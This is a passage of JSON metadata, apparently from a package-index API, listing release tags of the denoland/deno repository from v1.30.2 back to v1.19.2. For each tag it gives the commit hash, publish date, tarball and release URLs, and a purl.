000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.